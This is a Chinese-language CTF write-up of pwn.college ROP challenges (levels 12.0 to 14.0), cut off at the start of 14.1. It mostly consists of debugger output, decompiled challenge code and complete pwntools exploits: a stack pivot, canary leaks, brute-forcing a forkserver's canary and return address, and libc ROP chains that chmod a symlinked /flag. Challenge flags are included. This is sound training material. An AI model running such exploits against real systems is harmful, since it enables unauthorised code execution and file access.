───────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]───────────────────────────────────────────────────────────
 RAX  0
 RBX  0x7ffe6ec57aa8 —▸ 0x7ffe6ec58633 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level12.0'
 RCX  0x7e9cf1d1b7a4 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0
 RDI  0x7e9cf1df8710 ◂— 0
 RSI  0x7e9cf1df7643 (_IO_2_1_stdout_+131) ◂— 0xdf8710000000000a /* '\n' */
 R8   0x78
 R9   0xfffffff2
 R10  0
 R11  0x202
 R12  1
 R13  0
 R14  0x7e9cf25ef000 (_rtld_global) —▸ 0x7e9cf25f02e0 —▸ 0x5978a8128000 ◂— 0x10102464c457f
 R15  0
 RBP  0x7ffe6ec57a20 —▸ 0x7ffe6ec57a80 ◂— 0
 RSP  0x7ffe6ec57988 —▸ 0x7e9cf1c34e08 ◂— mov edi, eax
 RIP  0x5978a812a2b7 (main+912) ◂— ret
────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]────────────────────────────────────────────────────────────────────
 ► 0x5978a812a2b7 <main+912>    ret                                <0x7e9cf1c34e08>
    ↓
   0x7e9cf1c34e08               mov    edi, eax     EDI => 0
   0x7e9cf1c34e0a               call   exit                        <exit>

   0x7e9cf1c34e0f               call   0x7e9cf1c9ffa0              <0x7e9cf1c9ffa0>

   0x7e9cf1c34e14               lock sub dword ptr [rip + 0x1c12b4], 1
   0x7e9cf1c34e1c               je     0x7e9cf1c34e38              <0x7e9cf1c34e38>

   0x7e9cf1c34e1e               mov    edx, 0x3c                   EDX => 0x3c
   0x7e9cf1c34e23               nop    word ptr cs:[rax + rax]
   0x7e9cf1c34e2e               nop
   0x7e9cf1c34e30               xor    edi, edi                    EDI => 0
   0x7e9cf1c34e32               mov    eax, edx
─────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7ffe6ec57988 —▸ 0x7e9cf1c34e08 ◂— mov edi, eax
01:0008│-090 0x7ffe6ec57990 —▸ 0x7ffe6ec579d0 —▸ 0x7e9cf25ef000 (_rtld_global) —▸ 0x7e9cf25f02e0 —▸ 0x5978a8128000 ◂— ...
02:0010│-088 0x7ffe6ec57998 —▸ 0x7ffe6ec57aa8 —▸ 0x7ffe6ec58633 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level12.0'
03:0018│-080 0x7ffe6ec579a0 ◂— 0x1a8128040
04:0020│-078 0x7ffe6ec579a8 —▸ 0x5978a8129f27 (main) ◂— endbr64
05:0028│-070 0x7ffe6ec579b0 —▸ 0x7ffe6ec57aa8 —▸ 0x7ffe6ec58633 ◂— '/home/cub3y0nd/Projects/pwn.college/babyrop_level12.0'
06:0030│-068 0x7ffe6ec579b8 ◂— 0xedc16b49efc02286
07:0038│-060 0x7ffe6ec579c0 ◂— 1
───────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────────────────────────
 ► 0   0x5978a812a2b7 main+912
   1   0x7e9cf1c34e08
   2   0x7e9cf1c34ecc __libc_start_main+140
   3   0x5978a812926e _start+46
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> vmmap 0x7e9cf1c34e08
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
             Start                End Perm     Size Offset File
    0x7e9cf1c0f000     0x7e9cf1c33000 r--p    24000      0 /usr/lib/libc.so.6
►   0x7e9cf1c33000     0x7e9cf1da4000 r-xp   171000  24000 /usr/lib/libc.so.6 +0x1e08
    0x7e9cf1da4000     0x7e9cf1df2000 r--p    4e000 195000 /usr/lib/libc.so.6
pwndbg> x/2i 0x7e9cf1c3471e
   0x7e9cf1c3471e: mov    eax,DWORD PTR [rbp-0x38]
   0x7e9cf1c34721: sub    rax,QWORD PTR fs:0x28
pwndbg>

难怪打不通，原来是因为这个 Level 没有 challenge 函数了，这个 Level 只有一个 main 函数，所以会返回到 libc 中。而之前有 challenge 函数的时候会返回到 main，所以我们才可以用 binary 的 gadgets，但这次返回到 libc 了自然就不能用 binary 的 gadgets 了，必须找 libc 中可用的 gadgets。

λ ~/Projects/pwn.college/ ROPgadget --binary /usr/lib/libc.so.6 --re "leave" --depth=3
Gadgets information
============================================================
  <snip>
0x0000000000026042 : leave ; jmp rax
0x0000000000188253 : leave ; jmp rcx
0x00000000000fe0c8 : leave ; notrack jmp rcx
0x000000000002556a : leave ; ret
0x00000000000ea14b : leave ; retf
0x000000000003bcee : movq mm0, mm2 ; leave ; ret
0x0000000000040f4e : pop rax ; leave ; ret
  <snip>

Unique gadgets found: 190

pwndbg> vmmap
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
             Start                End Perm     Size Offset File
    0x5978a8128000     0x5978a8129000 r--p     1000      0 /home/cub3y0nd/Projects/pwn.college/babyrop_level12.0
    0x5978a8129000     0x5978a812b000 r-xp     2000   1000 /home/cub3y0nd/Projects/pwn.college/babyrop_level12.0
    0x5978a812b000     0x5978a812c000 r--p     1000   3000 /home/cub3y0nd/Projects/pwn.college/babyrop_level12.0
    0x5978a812c000     0x5978a812d000 r--p     1000   3000 /home/cub3y0nd/Projects/pwn.college/babyrop_level12.0
    0x5978a812d000     0x5978a812e000 rw-p     1000   4000 /home/cub3y0nd/Projects/pwn.college/babyrop_level12.0
    0x7e9cf1c0f000     0x7e9cf1c33000 r--p    24000      0 /usr/lib/libc.so.6
    0x7e9cf1c33000     0x7e9cf1da4000 r-xp   171000  24000 /usr/lib/libc.so.6
    0x7e9cf1da4000     0x7e9cf1df2000 r--p    4e000 195000 /usr/lib/libc.so.6
    0x7e9cf1df2000     0x7e9cf1df6000 r--p     4000 1e3000 /usr/lib/libc.so.6
    0x7e9cf1df6000     0x7e9cf1df8000 rw-p     2000 1e7000 /usr/lib/libc.so.6
    0x7e9cf1df8000     0x7e9cf1e00000 rw-p     8000      0 [anon_7e9cf1df8]
    0x7e9cf1e00000     0x7e9cf1e07000 r--p     7000      0 /usr/lib/libcapstone.so.5
    0x7e9cf1e07000     0x7e9cf1edd000 r-xp    d6000   7000 /usr/lib/libcapstone.so.5
    0x7e9cf1edd000     0x7e9cf23b3000 r--p   4d6000  dd000 /usr/lib/libcapstone.so.5
    0x7e9cf23b3000     0x7e9cf24f5000 r--p   142000 5b3000 /usr/lib/libcapstone.so.5

    0x7e9cf24f5000     0x7e9cf24f6000 rw-p     1000 6f5000 /usr/lib/libcapstone.so.5
    0x7e9cf2585000     0x7e9cf258a000 rw-p     5000      0 [anon_7e9cf2585]
    0x7e9cf25b2000     0x7e9cf25b3000 r-xp     1000      0 [anon_7e9cf25b2]
    0x7e9cf25b3000     0x7e9cf25b7000 r--p     4000      0 [vvar]
    0x7e9cf25b7000     0x7e9cf25b9000 r-xp     2000      0 [vdso]
    0x7e9cf25b9000     0x7e9cf25ba000 r--p     1000      0 /usr/lib/ld-linux-x86-64.so.2
    0x7e9cf25ba000     0x7e9cf25e3000 r-xp    29000   1000 /usr/lib/ld-linux-x86-64.so.2
    0x7e9cf25e3000     0x7e9cf25ed000 r--p     a000  2a000 /usr/lib/ld-linux-x86-64.so.2
    0x7e9cf25ed000     0x7e9cf25ef000 r--p     2000  34000 /usr/lib/ld-linux-x86-64.so.2
    0x7e9cf25ef000     0x7e9cf25f1000 rw-p     2000  36000 /usr/lib/ld-linux-x86-64.so.2
    0x7ffe6ec38000     0x7ffe6ec59000 rw-p    21000      0 [stack]
0xffffffffff600000 0xffffffffff601000 --xp     1000      0 [vsyscall]
pwndbg> x/2i 0x7e9cf1c0f000+0x000000000002556a
   0x7e9cf1c3456a <warn+185>: leave
   0x7e9cf1c3456b <warn+186>: ret
pwndbg>

嗯……理论上我们爆破 5 nibbles 必定可以成功，但实际上我们很幸运，在默认返回地址附近存在可用的 gadgets 来实现栈迁移，所以最终我们只需爆破 3 nibbles 就好了。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    context,
    flat,
    gdb,
    log,
    process,
    random,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level12.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *main+912
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def random_nibbles():
    return random.randint(0x0000, 0xFFFF).to_bytes(2, "little")


def leak(target):
    target.recvuntil(b"located at: ")

    return int(target.recv(0xE), 16)


def construct_payload(leaked_addr):
    padding_to_rbp = b"".ljust(0x68, b"A")

    payload = padding_to_rbp
    payload += flat(
        leaked_addr - 0x10,
        random_nibbles(),
    )

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        target = None

        try:
            target = launch(debug=False)
            payload = construct_payload(leak(target))

            if attack(target, payload):
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")
        finally:
            if target is not None:
                target.close()


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Yq8SiIRAxHtJeQWDahvT9Q5y0pE.01M2MDL5cTNxgzW}

Level 12.1

Information

Category: Pwn

Description

Creatively apply stack pivoting to call the win function.

Write-up

参见 Level 12.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    context,
    flat,
    gdb,
    log,
    process,
    random,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level12.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def send_payload(target, payload):
    try:
        target.send(payload)
    except Exception as e:
        log.exception(f"An error occurred while sending payload: {e}")


def random_nibbles():
    return random.randint(0x0000, 0xFFFF).to_bytes(2, "little")


def leak(target):
    target.recvuntil(b"located at: ")

    return int(target.recv(0xE), 16)


def construct_payload(leaked_addr):
    padding_to_rbp = b"".ljust(0x58, b"A")

    payload = padding_to_rbp
    payload += flat(
        leaked_addr - 0x10,
        random_nibbles(),
    )

    return payload


def attack(target, payload):
    try:
        send_payload(target, payload)

        response = target.recvall(timeout=3)

        if b"pwn.college{" in response:
            return True
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        target = None

        try:
            target = launch(debug=False)
            payload = construct_payload(leak(target))

            if attack(target, payload):
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")
        finally:
            if target is not None:
                target.close()


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{4358dHEnXGJJC945avk1i2By5c6.0FN2MDL5cTNxgzW}

Level 13.0

Information

Category: Pwn

Description

Perform ROP when the function has a canary!

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [rsp+0h] [rbp-A0h] BYREF
  const char **v5; // [rsp+8h] [rbp-98h]
  const char **v6; // [rsp+10h] [rbp-90h]
  int v7; // [rsp+1Ch] [rbp-84h]
  int v8; // [rsp+28h] [rbp-78h]
  int v9; // [rsp+2Ch] [rbp-74h]
  const void *v10[3]; // [rsp+30h] [rbp-70h] BYREF
  __int64 v11; // [rsp+48h] [rbp-58h]
  _BYTE buf[72]; // [rsp+50h] [rbp-50h] BYREF
  unsigned __int64 v13; // [rsp+98h] [rbp-8h]
  __int64 savedregs; // [rsp+A0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+A8h] [rbp+8h] BYREF

  v7 = argc;
  v6 = argv;
  v5 = envp;
  v13 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  v8 = argc;
  v10[1] = argv;
  v10[2] = v5;
  puts(
    "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of");
  puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n");
  sp_ = (__int64)&v4;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v4) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts(
    "PIE is turned on! This means that you do not know where any of the gadgets in the main binary are. However, you can do a");
  puts(
    "partial overwrite of the saved instruction pointer in order to execute 1 gadget! If that saved instruction pointer goes");
  puts(
    "to libc, you will need to ROP from there. If that saved instruction pointer goes to the main binary, you will need to");
  puts(
    "ROP from there. You may need need to execute your payload several times to account for the randomness introduced. This");
  puts("might take anywhere from 0-12 bits of bruteforce depending on the scenario.\n");
  puts("ASLR means that the address of the stack is not known,");
  puts("but I will simulate a memory disclosure of it.");
  puts("By knowing where the stack is, you can now reference data");
  puts("that you write onto the stack.");
  puts("Be careful: this data could trip up your ROP chain,");
  puts("because it could be interpreted as return addresses.");
  puts("You can use gadgets that shift the stack appropriately to avoid that.");
  printf("[LEAK] Your input buffer is located at: %p.\n\n", buf);
  puts("This will simulate an 8-byte arbitrary read.");
  v10[0] = 0LL;
  puts("Address in hex to read from:");
  __isoc99_scanf("%p", v10);
  v11 = *(_QWORD *)v10[0];
  printf("[LEAK] *%p = 0x%016llx\n\n", v10[0], v11);
  v9 = read(0, buf, 0x1000uLL);
  printf("Received %d bytes! This is potentially %d gadgets.\n", v9, (unsigned __int64)&buf[v9 - rp_] >> 3);
  puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable");
  puts("from within this challenge. You will have to do that by yourself.");
  print_chain(rp_, (unsigned int)((unsigned __int64)&buf[v9 - rp_] >> 3) + 1);
  puts("Leaving!");
  puts("### Goodbye!");
  return 0;
}

这题不难吧，标绿部分模拟了一个泄漏，我们可以通过它把 canary 泄漏出来。之后我们想办法返回到 __libc_start_main 再次调用 main 函数，泄漏一个 libc 地址出来，计算 libc 基址，有了基址就可以去构造 ROP Chain 了。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    p8,
    process,
    random,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level13.0"
HOST, PORT = "localhost", 1337

gdbscript = """
b *main+770
c
"""

CANARY_OFFSET = 0x48
RET_OFFSET = 0x58
LIBC_OFFSET = 0x24083


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def leak(target, offset, info_type):
    target.recvuntil(b"located at: ")
    leaked_addr = int(target.recvline().rstrip(b".\n"), 16) + offset

    target.sendline(hex(leaked_addr).encode("ascii"))
    target.recvuntil(b"[LEAK]")

    if info_type == "canary":
        return int(target.recvline()[21:], 16)
    elif info_type == "libc_base":
        return int(target.recvline()[21:], 16)
    else:
        log.error(b"Invalid info type!")


def construct_payload(stage, canary, libc_base=None):
    if stage == 1:
        __libc_start_main_fixed_low_byte = b"\x90"
        __libc_start_main_high_byte_candidates = [
            p8(i) for i in range(0x0F, 0x10F, 0x10)
        ]

        return flat(
            b"".ljust(CANARY_OFFSET, b"A"),
            canary,
            b"".ljust(0x8, b"A"),
            __libc_start_main_fixed_low_byte
            + random.choice(__libc_start_main_high_byte_candidates),
        )
    elif stage == 2:
        if libc_base is None:
            log.failure("libc_base is required for stage 2!")
            exit()

        local_libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
        local_libc.address = libc_base - LIBC_OFFSET

        rop = ROP(local_libc)

        pop_rdi_ret = rop.rdi.address
        pop_rsi_ret = rop.rsi.address

        filename = next(local_libc.search(b"GNU"))
        mode = 0o4

        return flat(
            b"".ljust(CANARY_OFFSET, b"A"),
            canary,
            b"".ljust(0x8, b"A"),
            pop_rdi_ret,
            filename,
            pop_rsi_ret,
            mode,
            local_libc.symbols["chmod"],
        )
    else:
        log.error(b"Invalid stage number!")


def attack(target):
    try:
        os.system("ln -s /flag GNU")

        leaked_canary = leak(target, CANARY_OFFSET, "canary")
        payload = construct_payload(1, leaked_canary)

        target.send(payload)

        try:
            response = target.recvuntil(b"Welcome to (null)!", timeout=0.1)

            if b"Welcome to (null)!" in response:
                payload = construct_payload(
                    2, leaked_canary, leak(target, RET_OFFSET, "libc_base")
                )

                target.send(payload)
        except Exception as e:
            log.failure(f"String not detected in this turn. {e}")

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as f:
                log.success(f.read())
            return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        target = None

        try:
            target = launch(debug=False)

            if attack(target):
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")
        finally:
            if target is not None:
                target.close()


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Mw9zt3eeAB8_8it-_3_NRUzoHRA.0VN2MDL5cTNxgzW}

Level 13.1

Information

Category: Pwn

Description

Perform ROP when the function has a canary!

Write-up

参见 Level 13.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    p8,
    process,
    random,
    remote,
)

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level13.1"
HOST, PORT = "localhost", 1337

gdbscript = """
c
"""

CANARY_OFFSET = 0x78
RET_OFFSET = 0x88
LIBC_OFFSET = 0x24083


def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        if debug:
            return gdb.debug(
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
            )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def leak(target, offset, info_type):
    target.recvuntil(b"located at: ")
    leaked_addr = int(target.recvline().rstrip(b".\n"), 16) + offset

    target.sendline(hex(leaked_addr).encode("ascii"))
    target.recvuntil(b"[LEAK]")

    if info_type == "canary":
        return int(target.recvline()[21:], 16)
    elif info_type == "libc_base":
        return int(target.recvline()[21:], 16)
    else:
        log.error(b"Invalid info type!")


def construct_payload(stage, canary, libc_base=None):
    if stage == 1:
        __libc_start_main_fixed_low_byte = b"\x90"
        __libc_start_main_high_byte_candidates = [
            p8(i) for i in range(0x0F, 0x10F, 0x10)
        ]

        return flat(
            b"".ljust(CANARY_OFFSET, b"A"),
            canary,
            b"".ljust(0x8, b"A"),
            __libc_start_main_fixed_low_byte
            + random.choice(__libc_start_main_high_byte_candidates),
        )
    elif stage == 2:
        if libc_base is None:
            log.failure("libc_base is required for stage 2!")
            exit()

        local_libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
        local_libc.address = libc_base - LIBC_OFFSET

        rop = ROP(local_libc)

        pop_rdi_ret = rop.rdi.address
        pop_rsi_ret = rop.rsi.address

        filename = next(local_libc.search(b"GNU"))
        mode = 0o4

        return flat(
            b"".ljust(CANARY_OFFSET, b"A"),
            canary,
            b"".ljust(0x8, b"A"),
            pop_rdi_ret,
            filename,
            pop_rsi_ret,
            mode,
            local_libc.symbols["chmod"],
        )
    else:
        log.error(b"Invalid stage number!")


def attack(target):
    try:
        os.system("ln -s /flag GNU")

        leaked_canary = leak(target, CANARY_OFFSET, "canary")
        payload = construct_payload(1, leaked_canary)

        target.send(payload)

        try:
            response = target.recvuntil(b"Welcome to (null)!", timeout=0.1)

            if b"Welcome to (null)!" in response:
                payload = construct_payload(
                    2, leaked_canary, leak(target, RET_OFFSET, "libc_base")
                )

                target.send(payload)
        except Exception as e:
            log.failure(f"String not detected in this turn. {e}")

        target.recvall(timeout=3)

        try:
            with open("/flag", "r") as f:
                log.success(f.read())
            return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
        except Exception as e:
            log.exception(f"An error occurred while performing attack: {e}")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    while True:
        target = None

        try:
            target = launch(debug=False)

            if attack(target):
                exit()
        except Exception as e:
            log.exception(f"An error occurred in main: {e}")
        finally:
            if target is not None:
                target.close()


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{M-9WLFPzOoEolY4qgzOfZ2Xk3JW.0lN2MDL5cTNxgzW}

Level 14.0

Information

Category: Pwn

Description

Perform ROP against a network forkserver!

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  int optval; // [rsp+24h] [rbp-2Ch] BYREF
  int fd; // [rsp+28h] [rbp-28h]
  int v7; // [rsp+2Ch] [rbp-24h]
  sockaddr addr; // [rsp+30h] [rbp-20h] BYREF
  unsigned __int64 v9; // [rsp+48h] [rbp-8h]

  v9 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts("This challenge is listening for connections on TCP port 1337.\n");
  puts("The challenge supports unlimited sequential connections.\n");
  fd = socket(2, 1, 0);
  optval = 1;
  setsockopt(fd, 1, 15, &optval, 4u);
  addr.sa_family = 2;
  *(_DWORD *)&addr.sa_data[2] = 0;
  *(_WORD *)addr.sa_data = htons(0x539u);
  bind(fd, &addr, 0x10u);
  listen(fd, 1);
  while ( 1 )
  {
    v7 = accept(fd, 0LL, 0LL);
    if ( !fork() )
      break;
    close(v7);
    wait(0LL);
  }
  dup2(v7, 0);
  dup2(v7, 1);
  dup2(v7, 2);
  close(fd);
  close(v7);
  challenge((unsigned int)argc, argv, envp);
  puts("### Goodbye!");
  return 0;
}

int __fastcall challenge(int a1, __int64 a2, __int64 a3)
{
  _QWORD v4[3]; // [rsp+0h] [rbp-80h] BYREF
  int v5; // [rsp+1Ch] [rbp-64h]
  int v6; // [rsp+2Ch] [rbp-54h]
  _BYTE buf[72]; // [rsp+30h] [rbp-50h] BYREF
  unsigned __int64 v8; // [rsp+78h] [rbp-8h]
  __int64 savedregs; // [rsp+80h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+88h] [rbp+8h] BYREF

  v5 = a1;
  v4[2] = a2;
  v4[1] = a3;
  v8 = __readfsqword(0x28u);
  puts(
    "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of");
  puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n");
  sp_ = (__int64)v4;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)v4) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts(
    "PIE is turned on! This means that you do not know where any of the gadgets in the main binary are. However, you can do a");
  puts(
    "partial overwrite of the saved instruction pointer in order to execute 1 gadget! If that saved instruction pointer goes");
  puts(
    "to libc, you will need to ROP from there. If that saved instruction pointer goes to the main binary, you will need to");
  puts(
    "ROP from there. You may need need to execute your payload several times to account for the randomness introduced. This");
  puts("might take anywhere from 0-12 bits of bruteforce depending on the scenario.\n");
  v6 = read(0, buf, 0x1000uLL);
  printf("Received %d bytes! This is potentially %d gadgets.\n", v6, (unsigned __int64)&buf[v6 - rp_] >> 3);
  puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable");
  puts("from within this challenge. You will have to do that by yourself.");
  print_chain(rp_, (unsigned int)((unsigned __int64)&buf[v6 - rp_] >> 3) + 1);
  return puts("Leaving!");
}

forkserver，典。

爆破 Canary、ret2main, leak libc 再 ROP 应该就好了。2.9 有个 Nu1L Junior 招新赛，我得去抽个热闹，万一选上了岂不是很爽，但是现在才学到 ROP，好在还有一点时间，得提前学点堆了，就怕到时候遇到堆题啥也不会就死了……

反正这章只剩下两道题，我就先鸽着了，看了下简介感觉都不难，感觉无非就是把所有知识综合起来罢了。

吗的 Heap 镇南，我被蹂躏的好惨，还是先把这两题打了稳固下 rank 吧。

重新总结下思路：因为是 forkserver，子进程会沿用父进程的内存布局，所以我们可以把 canary 和 retaddr 爆破出来。有了 retaddr 后我们就可以使用一些程序本身的 gadgets 了，但是这些 gadgets 中不包含 syscall 什么的，所以不能做一些很 powerful 的事情，但是 libc 里面一定有好东西，那么问题就在于怎么获得 libc 基地址了。因为这个程序使用了 puts 函数，所以我们可以构造两个 stage payload，第一个 stage 用 puts@plt 泄漏 __libc_start_main 的地址，第二个 stage 根据泄漏出来的地址计算 libc 基地址，然后构造 ROP Chain Do anything whatever you want!

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    p8,
    process,
    remote,
    sleep,
    time,
)
from pwnlib.gdb import psutil

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level14.0"
HOST, PORT = "localhost", 1337

gdbscript = """
set follow-fork-mode child
b *challenge+383
c
"""

CANARY_OFFSET = 0x48
ELF_OFFSET = 0x23C8
LIBC_OFFSET = 0x23F90


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def get_forked_pid(parent_pid):
    children = psutil.Process(parent_pid).children()

    if len(children) != 1:
        raise ValueError(f"Expected 1 child process, found {len(children)}")

    log.success(f"Parent PID {parent_pid} -> Found child PID {children[0].pid}")

    return children[0].pid


def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        target = process([elf.path] + (argv or []), env=envp, aslr=aslr)

        if debug:
            if attach:
                nc_process = process(["nc", HOST, str(PORT)])
                sleep(1)

                gdb.attach(target=get_forked_pid(target.pid), gdbscript=gdbscript)

                return nc_process
            else:
                target.close()

                return gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def brute_force(target_type, fixed_byte, canary=b""):
    current = fixed_byte
    length = 0x8 if target_type == "canary" else 0x6
    start_time = time.time()

    while len(current) < length:
        for byte in range(0x0, 0xFF):
            with remote(HOST, PORT) as target:
                payload = flat(
                    b"".ljust(CANARY_OFFSET, b"A") + current + p8(byte)
                    if target_type == "canary"
                    else b"".ljust(CANARY_OFFSET, b"A")
                    + canary
                    + b"".ljust(0x8, b"A")
                    + current
                    + p8(byte)
                )

                target.send(payload)

                response = target.recvall(timeout=3)

                if (
                    target_type == "canary"
                    and b"*** stack smashing detected ***" not in response
                ) or (target_type == "retaddr" and b"Goodbye!" in response):
                    current += p8(byte)
                    break

    end_time = time.time()
    elapsed_time = end_time - start_time

    log.success(
        f"{target_type.capitalize()} brute-forced: {to_hex_bytes(current)} in {elapsed_time:.2f} seconds."
    )

    return current


def construct_payload(stage, canary, retaddr, leaked_libc=None):
    elf.address = int.from_bytes(retaddr, "little") - ELF_OFFSET

    rop = ROP(elf)

    pop_rdi_ret = rop.rdi.address
    pop_rsi_pop_r15_ret = rop.rsi.address

    if stage == 1:
        return flat(
            b"".ljust(CANARY_OFFSET, b"A"),
            canary,
            b"".ljust(0x8, b"A"),
            pop_rdi_ret,
            elf.got["__libc_start_main"],
            elf.plt["puts"],
        )
    elif stage == 2:
        if leaked_libc is None:
            log.failure("libc_base is required for stage 2!")
            exit()

        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
        libc.address = int.from_bytes(leaked_libc, "little") - LIBC_OFFSET

        filename = next(elf.search(b"GNU"))
        mode = 0o4

        return flat(
            b"".ljust(CANARY_OFFSET, b"A"),
            canary,
            b"".ljust(0x8, b"A"),
            pop_rdi_ret,
            filename,
            pop_rsi_pop_r15_ret,
            mode,
            b"".ljust(0x8, b"A"),
            libc.symbols["chmod"],
        )


def attack(stage, canary=None, retaddr=None, leaked_libc=None):
    try:
        if stage == 1:
            with remote(HOST, PORT) as target:
                payload = construct_payload(1, canary, retaddr)
                target.send(payload)

                response = target.recvall(timeout=1)

                return response[-7:].rstrip()
        elif stage == 2:
            os.system("ln -s /flag GNU")

            with remote(HOST, PORT) as target:
                payload = construct_payload(2, canary, retaddr, leaked_libc)

                target.send(payload)
                target.recvall(timeout=1)

            try:
                with open("/flag", "r") as f:
                    log.success(f.read())
                return True
            except FileNotFoundError:
                log.exception("The file '/flag' does not exist.")
            except PermissionError:
                log.failure("Permission denied to read '/flag'.")
        else:
            log.error(b"Invalid stage number!")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        launch(debug=False, attach=False)

        canary = brute_force("canary", b"\x00")
        retaddr = brute_force("retaddr", b"\xc8", canary)
        leaked_libc = attack(1, canary, retaddr)

        if attack(2, canary, retaddr, leaked_libc):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{wJF3GTTKHHSqaWXrhLMIUW4ocoT.01N2MDL5cTNxgzW}

Level 14.1

Information

Category: Pwn

Description

Perform ROP against a network forkserver!

Write-up

参见 Level 14.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
